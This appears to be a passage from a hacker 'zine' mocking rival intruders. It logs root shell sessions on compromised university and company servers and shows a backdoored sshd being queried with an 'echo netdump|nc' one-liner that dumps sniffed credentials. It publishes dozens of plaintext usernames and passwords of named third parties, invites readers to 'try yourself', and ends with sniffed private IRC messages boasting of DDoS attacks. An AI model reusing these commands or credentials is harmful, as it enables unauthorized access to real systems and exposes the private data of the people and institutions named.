                                                                     --------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf...

d4:~#
d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux
 03:36:51 up 68 days,  4:58,  0 user,  load average: 1.88, 1.80, 1.74
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:207.145.66.12  Bcast:207.145.66.255  Mask:255.255.255.0
          inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 212.111.196.163 22
Trying 212.111.196.163...
Connected to 212.111.196.163.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD !
SSH2_OUT: 127.0.0.1     user: root      pass: x4rtuhg6  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost.
pass_from: ::ffff:10.66.10.111  user: root      pass: dihlordifenil  --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(

central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163
root@212.111.196.163's password: 

Last login: Fri Aug  8 19:49:52 2008 from 189.4.161.222              ------------>>>>>>>>>>>>>> lets laugh for a while now

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux users 2.6.23-gentoo i686 ****

root@users:~#
root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
 10:49:08 up 171 days, 22:37,  1 user,  load average: 0.20, 0.24, 0.21
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0     10:46    0.00s  0.44s  0.00s w
          inet addr:192.168.253.3  Bcast:192.168.253.255  Mask:255.255.255.0
          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
          inet addr:169.254.78.132  Bcast:169.254.255.255  Mask:255.255.0.0
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          inet addr:212.111.196.163  Bcast:212.111.196.191  Mask:255.255.255.224
          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
          inet addr:212.26.143.6  Bcast:212.26.143.7  Mask:255.255.255.252
          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 212.143.216.226 22
Trying 212.143.216.226...
Connected to 212.143.216.226.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this.
pam_from: 62.219.238.196        user: root      pass: QWERFcxz  (mail2.tikalnetworks.com) ----->>>>>>>> no kidding.

central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226
root@212.143.216.226's password: 

jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet
Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux
 09:58:11 up 3 days, 18:03,  1 user,  load average: 1.29, 1.16, 1.08
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0     09:34   16:19   0.32s  0.30s ssh 10.0.0.3
          inet addr:10.0.0.253  Bcast:10.0.0.255  Mask:255.255.255.0
          inet addr:127.0.0.1  Mask:255.0.0.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep OUT
SSH2_OUT: 143.107.133.38        user: wlscopel  pass: va1513zb  (feynman.if.usp.br)
SSH2_OUT: 143.107.133.233       user: pdborges  pass: mipa0529  (aegir.if.usp.br)
SSH2_OUT: 143.106.42.243        user: luana     pass: 103174b   (athenas.cna.unicamp.br)
SSH2_OUT: 143.107.133.8         user: kpp       pass: fth6mdy   (landauer.if.usp.br)
SSH2_OUT: 143.107.133.47        user: luana     pass: 103174b   (schroedinger.if.usp.br)
SSH2_OUT: 143.107.133.76        user: mvarella  pass: CH3Ftri   (planck.if.usp.br)
SSH2_OUT: 143.107.133.38        user: wlscopel  pass: va1513zb  (feynman.if.usp.br)
SSH2_OUT: 143.107.133.47        user: cedric    pass: KunD1cka  (schroedinger.if.usp.br)

central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep from|grep -v bullshit
pass_from: 143.107.133.244      user: hmf18     pass: xpx9b15+  (turista.if.usp.br)
pass_from: 201.52.218.156       user: cedric    pass: P1chona04         (c934da9c.virtua.com.br)
pass_from: 201.82.105.213       user: mfsoares  pass: 3p1t@xy   (c95269d5.virtua.com.br)
pass_from: 189.34.88.209        user: kpp       pass: mdc6gpt   (bd2258d1.virtua.com.br)
pass_from: 189.102.19.167       user: pontes    pass: r@s&09*   (bd6613a7.virtua.com.br)
pass_from: 189.102.98.126       user: lassali   pass: las2008ro         (bd66627e.virtua.com.br)



central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103 'uname -a'
root@143.107.133.103's password: 

Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.144.186.37 22
Trying 200.144.186.37...
Connected to shark.lcca.usp.br (200.144.186.37).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages
SSH2_OUT: 127.0.0.1     user: root      pass: UspNNNNd  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW
SSH2_OUT: 127.0.0.1     user: amazonas  pass: UspNNNNd  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff

-> alot of kool shit regarding usp.br here
try yourself-> echo netdump|nc 200.144.186.37 22|grep usp.br
or just grep OUT

kthxnpurwelcome

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep localhost
SSH2_OUT: 127.0.0.1     user: root      pass: ArmY1*00  (localhost)        ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy

central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74
root@200.145.203.74's password: 

Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux hobbes 2.6.18-6-686 i686 ****

root@hobbes:~#
root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
 05:47:44 up 27 days, 15:12,  1 user,  load average: 0.21, 0.15, 0.06
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
rico     :0       -                06Aug08 ?xdm?   5:39   0.71s x-session-manager
          inet addr:200.145.203.74  Bcast:200.145.203.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
root@hobbes:~# 

central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep unesp        
pass_from: 200.145.203.42       user: rico      pass: so31fia12         (nemo.df.ibilce.unesp.br)
SSH2_OUT: 200.145.203.42        user: ronaldo   pass: LANmu80   (nemo.df.ibilce.unesp.br)

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 67.15.56.12 22
Trying 67.15.56.12...
Connected to 67.15.56.12.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9
netdump
SSH2_OUT: 127.0.0.1     user: root      pass: l3nny1nt3l        (localhost)
SSH2_OUT: 127.0.0.1     user: lenny     pass: l3nny1nt3l        (localhost)
pass_from: 76.188.180.141       user: joe       pass: 1207j0s3ph7ys0n9813       (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141       user: devel     pass: ha1W0;rlD.0121    (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141       user: celtrust  pass: 1207j0s3ph9813    (cpe-76-188-180-141.neo.res.rr.com)



central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12
root@67.15.56.12's password: 

Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 ****

[root[@f1 ~]#
[root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
 05:20:15 up 153 days,  9:30,  0 users,  load average: 2.62, 1.27, 0.63
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:67.15.56.12  Bcast:67.15.57.255  Mask:255.255.254.0
          inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
          inet addr:67.15.57.240  Bcast:67.15.57.255  Mask:255.255.255.0
          inet addr:67.15.57.241  Bcast:67.15.57.255  Mask:255.255.255.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19
root@66.119.174.19's password: 



                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 ****

root@res1:~# 
root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
 12:54:34 up 315 days, 17:40,  4 users,  load average: 0.58, 0.35, 0.27
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
sky      pts/0    66.119.176.2     11:41    1:12   0.00s  0.00s -bash
sky      pts/3    66.119.176.2     Tue15   20:53   0.18s  0.00s sshd: sky [priv] 
sky      pts/6    66.119.176.2     11:42    1:10   0.16s  0.01s sshd: sky [priv] 
vee      pts/7    74.221.143.3     12:23   28:41m  0.07s  0.00s telnet seton-3550
          inet addr:66.119.174.4  Bcast:66.119.174.15  Mask:255.255.255.240
          inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
          inet addr:66.119.174.29  Bcast:66.119.174.31  Mask:255.255.255.240
          inet addr:65.39.152.235  Bcast:65.39.152.255  Mask:255.255.255.224
          inet addr:65.39.152.237  Bcast:65.39.152.255  Mask:255.255.255.224
          inet addr:66.119.174.19  Bcast:66.119.174.31  Mask:255.255.255.240
          inet addr:65.39.152.239  Bcast:65.39.152.255  Mask:255.255.255.224
          inet addr:66.119.174.3  Bcast:66.119.174.15  Mask:255.255.255.240
          inet addr:66.119.174.2  Bcast:66.119.174.15  Mask:255.255.255.240

pass_from: 66.119.176.2         user: simon     pass: pass77    (mail.metrobridge.com)        [whole metrobridge with the same pass]
pass_from: 66.119.176.2         user: sky       pass: rotoFro7  (mail.metrobridge.com)        [whole metrobridge with the same pass]

have fun

- what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :(


-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102
root@200.239.200.102's password: 

Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
Linux 2.6.11.12-ul1.

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux proxy2-rj 2.6.11.12-ul1 i686 ****

root@proxy2-rj:~# 
root@proxy2-rj:~# uname -a;hostname -f;w
Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown
proxy2-rj.pop-rio.com.br
 17:14:22 up 97 days,  5:09,  0 users,  load average: 2.16, 1.88, 1.76
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root@proxy2-rj:~# 
root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq
pass_from: 200.239.245.50       user: root      pass: Beth01@   (gwpr03.microlink.com.br)
pass_from: 200.239.245.70       user: root      pass: pa$$w0rd  (Froes.microlink.com.br)
root@proxy2-rj:~# ./sshread mac.h|grep OUT
SSH2_OUT: 127.0.0.1     user: root      pass: BuCaaAadd         (localhost) -----> /me laughs

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214
root@143.107.250.214's password:

Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br

                          ..... !! HELLO WORLD !! .....              

                            @@@@@@              @@@@@@               
                           @@    @@            @@    @@              
                 @@    @@  @@   @@@  @@    @@  @@   @@@  @@    @@    
                  @@  @@   @@  @ @@   @@  @@   @@  @ @@   @@  @@     
                   IIII    II I  II    IIII    II I  II    IIII      
                   IIII    III   II    IIII    III   II    IIII      
                  II  II   II    II   II  II   II    II   II  II     
                 II    II   IIIIII   II    II   IIIIII   II    II    
                 **** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 ****          ->>>> new kool motd, n1cE rIpZ

[root[@noelrosa ~]#

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-;;;;;;; i think thats enough to paste, right ?
-;;;;;;  anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got from them

-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/ 

r47 is r47@bl4ckh47.org * i own u!            [and We own you!]
r47 on @#combat #osiris @#/<-rad 
r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server
r47 actually using host 2001:470:1f15:42b::3
r47 End of /WHOIS list.

central@labsec [~xoxox/h3h3] # ssh root@bl4ckh47.org -p 2222 bash

root@bl4ckh47.org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz)
uname -a;w;hostname -f
Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux
 10:13:26 up 162 days,  8:25,  0 users,  load average: 0.04, 0.05, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
VoIP.eurosignal.cz

sit0      Link encap:IPv6-in-IPv4  
          inet6 addr: ::10.0.2.254/96 Scope:Compat
          inet6 addr: ::127.0.0.1/96 Scope:Unknown
          inet6 addr: ::10.0.2.4/96 Scope:Compat
          inet6 addr: ::77.78.84.242/96 Scope:Compat
          UP RUNNING NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

sit1      Link encap:IPv6-in-IPv4  
          inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
          inet6 addr: fe80::a00:2fe/64 Scope:Link
          inet6 addr: fe80::a00:204/64 Scope:Link
          inet6 addr: fe80::4d4e:54f2/64 Scope:Link
          UP POINTOPOINT RUNNING NOARP  MTU:1480  Metric:1
          RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1677861 (1.6 MiB)  TX bytes:982003 (958.9 KiB)

tcp        0      0 77.48.84.242:65535      189.4.189.139:61593     ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667  ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED

perl      12655     root    4u  IPv4  3027913       TCP *:65535 (LISTEN)
root     12655  0.0  0.3   5256  3220 ?        S    Mar19   2:39 supervise log
- nice process name btw
- lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks - 

<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :u know d0n
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he took my nick
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he's packeting me
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :;\
-> PRIVMSG d0n_ :d0n No such nick/channel
-> PRIVMSG d0n_ :d0n End of /WHOIS list.
-> PRIVMSG d0n_ :change
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :lamer :(
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :owns my dsl
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :real leet
-> PRIVMSG d0n :who ?
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :that d0n guy
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :had my nick
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :was talking shit
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :"here comes the ddos" he said
-> PRIVMSG d0n :fuck
-> PRIVMSG d0n :lets hack him
-> PRIVMSG d0n :not hard target
-> PRIVMSG d0n :hehehe
-> PRIVMSG d0n :to me
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HHEHEHEEH\
-> PRIVMSG d0n ::>:>:>:>
-> PRIVMSG d0n :sup bitchx
-> PRIVMSG d0n ::>
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 ::)
-> PRIVMSG d0n :bitchx bugged
-> PRIVMSG d0n :do u use it ?
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :the client?
-> PRIVMSG d0n :yah
-> PRIVMSG d0n :0dayz
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :no shit..
-> PRIVMSG d0n :eheh

*********************** run to the hillz he h4s b1tchx 0d4y **********************

-> PRIVMSG d0n :i have windows on linux (vmware)                              ->>>>>>>>>>>>>>>>>>>>> lies
-> PRIVMSG d0n :hjmm
-> PRIVMSG d0n :;>
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :ah yeah
-> PRIVMSG d0n :omfg
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :any more fun with efnet soon?
-> PRIVMSG d0n :im still drunked
-> PRIVMSG d0n :no more
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HEHE
-> PRIVMSG d0n :im stoped with x0x0x
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :;p
-> PRIVMSG d0n :just sniffing idiots now                                      ->>>>>>>>>>>>>>>>>>>> so we are

*********************** /laugh time ********************************************                               
-> PRIVMSG accuser :nem
-> PRIVMSG accuser :nao me comunico mais com povo br                          ->>>>>>>>>>>>>>>>>>>>
-> PRIVMSG accuser :nao eh meu nivel
-> PRIVMSG accuser :so alguns amigos
-> PRIVMSG accuser :nego roubo meu canal ontem                                ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby
-> PRIVMSG accuser :recuperei
-> PRIVMSG accuser :e tomei o nick deles                                      ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks
-> PRIVMSG accuser :/w psys                      
-> PRIVMSG accuser :/w dtr
-> PRIVMSG accuser :hehehe                                                    ->>>>>>>>>>>>>>>>>>>> now i feel gr8
<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :eu vi
<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :o psys tacando monte de bot
-> PRIVMSG accuser :comigo eh dificil um br poder                             ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
-> PRIVMSG accuser :hehehe
-> PRIVMSG accuser :eu mando!                                                 ->>>>>>>>>>>>>>>>>>>> im THE guy!
-> PRIVMSG accuser :eu to mo fora de guerra cara
-> PRIVMSG accuser :mas parece q os caras me perseguem
-> PRIVMSG accuser :e sismam q sou lamer                                      ->>>>>>>>>>>>>>>>>>>> /me laughs
-> PRIVMSG accuser :rs

-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47                                ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing
-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax  ->>>>>>>>>>>>>>>>>>>> 3h3h3h3

<- :KoaL4!h@216.75.56.186 PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
-> PRIVMSG KoaL4 :cara
-> PRIVMSG KoaL4 :vou
-> PRIVMSG KoaL4 :mas nao me atrapalha
-> PRIVMSG KoaL4 :to aki programando
-> PRIVMSG KoaL4 :pra um cliente chato pra kct

<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :ta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :arrumando truta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com os cara da defland pq
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :falaram meu nome em vao
-> PRIVMSG \g4br13l\ :nao qro isso
-> PRIVMSG \g4br13l\ :so isso
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :r47
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :tu se esquenta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com bobagem
-> PRIVMSG \g4br13l\ :hehee
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :nao qro pivete
-> PRIVMSG \g4br13l\ :de merda
-> PRIVMSG \g4br13l\ :kiddie
-> PRIVMSG \g4br13l\ :falando de mim
-> PRIVMSG \g4br13l\ :pq qm manda                                       ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ :sou eu                                            ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :esse univie.ac.at eh show
-> PRIVMSG \g4br13l\ :tenho a www la
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :usam checkpoint firewall one                      ----->>>>>>>>>>>>> what the fuck ?
-> PRIVMSG \g4br13l\ :tunnelling by trace                               ----->>>>>>>>>>>>> ?!?1
-> PRIVMSG \g4br13l\ :mto dificil pacota-la


*********************** boyfriends are fighting - portuguese only, sorry **********************
-> PRIVMSG #thc :skotch is gay
-> PRIVMSG skotch :eai vagabunda
-> PRIVMSG skotch :vai fica na putaria ateh qdo
-> PRIVMSG skotch :to cheio de novidades
-> PRIVMSG skotch :e para de me chamar de verme
-> PRIVMSG skotch :rs
<- ::skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo
-> PRIVMSG skotch :ahahaha
-> PRIVMSG skotch :vc tem certeza                                     ->>>>>>>>> are you sure baby ?
-> PRIVMSG skotch :entao eh  isso ?
-> PRIVMSG skotch :ja era ?:
-> PRIVMSG skotch :ja era ?
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :sim
-> PRIVMSG skotch :eu nao vou voltar aki denovo
-> PRIVMSG skotch :pra falar com vc
-> PRIVMSG skotch :ja era ?
-> PRIVMSG skotch :CERTEZA?                                             ->>>>>>>> are you sure we are breaking apart?????
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo
-> PRIVMSG skotch :to na minha tb
-> PRIVMSG skotch :so acho
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vc fala merda e dps quer voltar a tras
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :coisa de mlk
-> PRIVMSG skotch :filho
-> PRIVMSG skotch :eu so acho
-> PRIVMSG skotch :q eh besteira
-> PRIVMSG skotch :agente brigasr por isso
-> PRIVMSG skotch :so isso
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :mermao n eh a primeira vez
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tu da dessas
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vem falando bosta
:skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e dps vem se desculpando
-> PRIVMSG skotch :so joguei um verde
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n so esses verme de merda
